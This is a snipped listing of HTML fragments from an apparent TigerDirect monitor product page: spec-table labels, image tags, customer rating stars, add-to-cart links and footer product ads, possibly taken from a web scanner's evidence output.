<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Display Type:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Screen Size:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Widescreen:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Diagonal Size:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Display Colors:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Display Format:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Touch Screen:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Interface Type:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
HDMI:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Maximum Resolution:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Condition:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Features:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Speakers:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Contrast Ratio:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Dynamic Contrast Ratio:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Brightness:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Response Time:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Horizontal Viewing Angle:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Vertical Viewing Angle:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
VESA Mounting Compliant:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Dimensions With Stand:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Unit Weight:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Power Consumption:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2"></td>
...[SNIP]...
<td valign="top" class="font_size3"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="100%" height="10"><span class="font_size4bold">
...[SNIP]...
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call01-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call02-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call03-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call04-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call05-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call06-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call07-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call08-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call09-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call10-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call11-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call12-jfwd.jpg"></p>
...[SNIP]...
</table><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2"></td>
...[SNIP]...
<td width="48%"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="20"><span class="ReviewMainHeading">
...[SNIP]...
<span class="ReviewMainHeadingBottom">
                               Customer Rating:.
                                   <img style="vertical-align:bottom" src="http://images.highspeedbackbone.net/ratingstars/star9.gif">
                               .
                                   4.1<br>
...[SNIP]...
<br><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td height="12" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="125"></td>
...[SNIP]...
<td height="12" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="100"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="25"></td>
...[SNIP]...
<td height="12" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="100"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="25"></td>
...[SNIP]...
<td height="12" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="88"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="37"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6532393&amp;csid=ITD&amp;body=REVIEWS&amp;ReviewMode=1#WriteReview"><img src="http://images.highspeedbackbone.net/item-details/Button1_WriteReview.gif" border="0"></a>
...[SNIP]...
</table><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="1" vspace="10"><br>
...[SNIP]...
<span class="ReviewCustomerRating">Customer Rating:.
                                                       <img style="vertical-align:bottom" src="http://images.highspeedbackbone.net/ratingstars/star8.gif">.
                                                       4.0<img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="96%" height="1" vspace="10"></span>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="125"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="125"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="75"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="50"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="75"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="50"></td>
...[SNIP]...
</table><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="1" vspace="15"><br>
...[SNIP]...
<span class="ReviewCustomerRating">Customer Rating:.
                                                       <img style="vertical-align:bottom" src="http://images.highspeedbackbone.net/ratingstars/star9.gif">.
                                                       4.3<img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="96%" height="1" vspace="10"></span>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="125"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="75"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="50"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="125"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="100"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="25"></td>
...[SNIP]...
</table><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="1" vspace="15"><br>
...[SNIP]...
</table><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<h3 id="productresources"><img src="http://images.highspeedbackbone.net/itemDetails/techspedia/techspediaTLCa.jpg" width="620" height="40"></h3>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<li><a href="http://static.highspeedbackbone.net/html/guide_dual_monitors.html" target="_new">Technology Guide: Dual Monitors</a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2" vspace="2"></td>
...[SNIP]...
<a href="/applications/category/category_slc.asp?CatId=41&" target="_blank">

<img src="http://images.highspeedbackbone.net/itemDetails/tech/bluecleaner2.jpg" alt="LCD Monitor & TV Cleaning Tips" border="0" height="94" width="88"></a>
...[SNIP]...
<a href="index.html" target="_top">

<img src="http://images.highspeedbackbone.net/itemDetails/tech/techtip.jpg" alt="Technology Knowledge, Information, and Resources: Technology News, Information Articles, Product Manuals, How To Guides, Brochures and Fact Sheets, Computer Glossary, and Technical Encyclopedia" border="0" height="25" width="82"></a>
...[SNIP]...
<p><img src="http://images.highspeedbackbone.net/itemDetails/bundleline.jpg" width="440"></p>
...[SNIP]...
<a name="dualmonitors">
<img border="0" src="http://images.highspeedbackbone.net/itemDetails/tech/dualmonitors88.jpg" ></a>
...[SNIP]...
<p><img src="http://images.highspeedbackbone.net/itemDetails/bundleline.jpg" width="440"></p>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="12"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="12"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="15"></td>
...[SNIP]...
<a id="itemdets_submit_img" href="javascript:addToiCart(6532393,document.getElementById('q_6532393').value,'ITD');"><img src="http://images.highspeedbackbone.net/item-details/addtocart.jpg" border="0"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2" vspace="10"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
</font><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="10"><br>
...[SNIP]...
<td valign="center" align="left"><img src="http://images.highspeedbackbone.net/refresh.gif" onclick="parent.frames['CaptchaFrame'].window.location.reload();" style="cursor: pointer; cursor: hand;"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<a href="#" onclick="window.open('/sectors/help/TigerLiveAssistance.asp','livehelp','width=640, height=580, scrollbars=yes')"><img src="http://images.highspeedbackbone.net/rightnav/liveHelpIcon160.jpg" border="0" style="margin:0px auto;"></a>
...[SNIP]...
<td width="36"><img src="http://images.highspeedbackbone.net/homepage/ups_logo.gif" width="36" height="41"></td>
...[SNIP]...
<td width="25"><img src="http://images.highspeedbackbone.net/homepage/help_icon.gif" width="25" height="25"></td>
...[SNIP]...
<td height="5"><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="5"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=4494089&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/S123-2002-main01-am.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(4494089,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6074882&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/S123-2020-main-or.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6074882,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6680906&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/E145-0452-Main-01-JH.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6680906,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6321551&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/U12-40889-main01-mc.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6321551,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6321954&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/P16-40922-mainx-hm.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6321954,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6321953&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/P16-40921-mainx-ac.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6321953,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=4558907&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/U12-40512-Main-sp.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(4558907,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=4558909&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/U12-40513_main_image001_im.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(4558909,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=3948472&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/ULT40289_main_image001_im.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(3948472,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=4558928&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/U12-40521-Main-sp.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(4558928,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=6764253&sku=B56-1006&amp;cm_sp=Footer-_-Spot%2001-_-CatId__B56-1006"><img src="http://images.highspeedbackbone.net/dealday/footer_B56-1006.jpg" alt="H&R Block At Home <BR>Deluxe 10 Software" border="0" title="H&R Block At Home Deluxe 10 Software- Personalized Tax Guidance With Advanced Tools"/></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=6764253&sku=B56-1006&amp;cm_sp=Footer-_-Spot%2001-_-CatId__B56-1006" class="info">MORE
INFO<img src="http://images.highspeedbackbone.net/frontproducts/greybubblearrow.gif" align="absmiddle" border="0" height="13" hspace="1" width="12" /></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=2795126&sku=TSD-500AAKS&amp;cm_sp=Footer-_-Spot%2002-_-CatId_8_TSD-500AAKS"><img src="http://images.highspeedbackbone.net/dealday/footer_TSD-500AAKS.jpg" alt="Western Digital Caviar Blue 500GB Hard Drive" border="0" title="Western Digital WD5000AAKS Caviar Blue Hard Drive - 500GB, 7200rpm, 16MB, SATA-300, OEM"/></a>
...[SNIP]...
